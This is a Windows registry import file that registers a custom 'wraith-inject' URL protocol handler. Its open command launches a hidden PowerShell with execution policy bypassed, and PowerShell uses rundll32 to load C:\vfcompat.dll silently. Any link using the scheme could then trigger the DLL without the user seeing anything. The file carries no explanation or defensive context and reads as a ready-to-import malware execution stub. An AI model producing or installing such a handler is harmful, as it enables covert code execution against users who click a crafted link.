Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\wraith-inject]
@="URL:Wraith Inject Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\wraith-inject\DefaultIcon]
@="C:\\Windows\\System32\\shell32.dll,1"

[HKEY_CLASSES_ROOT\wraith-inject\shell]

[HKEY_CLASSES_ROOT\wraith-inject\shell\open]

[HKEY_CLASSES_ROOT\wraith-inject\shell\open\command]
@="\"C:\\Windows\\System32\\cmd.exe\" /c start /min powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"Start-Process -WindowStyle Hidden -FilePath 'rundll32.exe' -ArgumentList 'C:\\vfcompat.dll,windowssupport' -NoNewWindow\""
